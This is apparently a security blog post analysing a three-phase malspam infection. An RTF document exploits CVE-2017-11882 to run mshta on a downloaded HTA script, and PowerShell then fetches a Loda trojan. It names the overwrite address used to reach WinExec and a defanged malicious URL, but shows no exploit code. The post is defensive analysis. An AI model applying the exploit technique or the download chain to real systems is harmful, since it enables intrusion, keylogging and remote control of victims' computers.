Every day we receive numerous phishing emails and others among them that, although they don’t directly attempt to steal user information, do contain malicious attachment. These types of emails are what we usually call malspam (malware spam), which could be defined as the indiscriminate sending of emails with malicious attachments and whose objective is to compromise the user’s computer. Once the PC is compromised, in some cases, it can become part of a botnet, a network of computers that, without the knowledge of their users, perform actions that are managed from a remote central server operated by the botnet manager. These actions range from sending more malspam to the contacts of the compromised users, to carrying out DDoS attacks on remote targets.
In the case we are going to analyse, the user received a suspicious email with an attached document that behaved strangely when it was opened, making connections to the Internet, something that is unusual in an office document. The attached document downloaded a script and executed it in the system. In turn, this script downloaded an executable file with malicious content.
Illustration 1. Infection process
In the case we’re studying, the infection was composed of 3 phases:
- Phase 1: Reception of the attachment that exploited Office’s vulnerability and executed the download of a script.
- Phase 2: Execution of the script and download of the binary.
- Phase 3: Execution of the binary and compromised system.
In this post, we will try to analyse the different phases of the system being compromised and will identify the methods used in each one of them.
Phase 1: Attached document
The user receives an email in their inbox with an attachment that pretends to be a Microsoft Word document. These emails often come from user accounts that have been previously compromised, and from which multiple emails have been sent to their contacts’ email addresses.
The received attachment has a .DOC extension, but really if we perform a more detailed analysis, we can see that it is an .RTF document and that inside it contains a Microsoft Office document that will open with Microsoft Word.
Illustration 2. Document header. rtf
This .DOC document contains code created specifically to exploit a vulnerability in the Microsoft Office equation editor Microsoft Equation 3.0 (CVE-2017-11882) that will be used to execute a series of commands that execute the download of the second phase of the infection.
This vulnerability is a stack buffer overflow in the management of one of the MTEF-type (MathType Equation Format) records used by the Microsoft Office equation editor. Overwriting is done with a string of characters that includes the command to be executed and the memory address (0x00430c12). This address refers to an instruction within this same application that points to the WinExec function of Kernel32.dll. The jump to said instruction will use as a parameter the stack record that has been overwritten and that now contains the command with the URL of the malicious file to execute, in our case http://urlz[.]fr/7lh3.
Illustration 3. Exploit used
Once the exploit is executed, we see the HTTP connection towards the outside, requesting the URL and following the redirection, then downloading the script followed by the binary.
Illustration 4. File download
Phase 2: Script downloaded
When the vulnerability is exploited, an .HTA file is downloaded from an external website and executed using the mshta.exe utility.
The attackers use mshta.exe to launch the execution of the .HTA file, which in this case includes VBScript code.
Illustration 5. Execution of mshta.exe
As we can see, the document’s code contains parts that are obfuscated, that is, the commands necessary to carry out the actions that will lead to the system being compromised are encoded in an apparently unintelligible way. These methods are usually used in order to avoid the automatic detection of these types of scripts.
Illustration 6. .hta application
It is common for the authors of these types of documents to use different obfuscation techniques and, although in this case it is a simple obfuscation, at other times they use very elaborate methods.
When we deobfuscate the script code, we can see that it uses PowerShell to execute several commands that download a binary from an external website.
Illustration 7. Deobfuscated script
Phase 3: File.exe execution
The downloaded binary is an executable file for Windows compressed with UPX. This type of compression is often used in different types of malware.
In this case, after looking for the binary hash in VirusTotal, we see that it had already been analysed and that according to the antivirus detections, it is a Trojan, specifically Loda (Nymeria) written in AutoIT.
Illustration 8. Detections in VirusTotal
This Trojan collects information from the computer and performs the functions of keylogger (saves all keystrokes that the user makes on the computer) and RAT (Remote Access Trojan) that allows the functions of the user’s computer to be remotely controlled.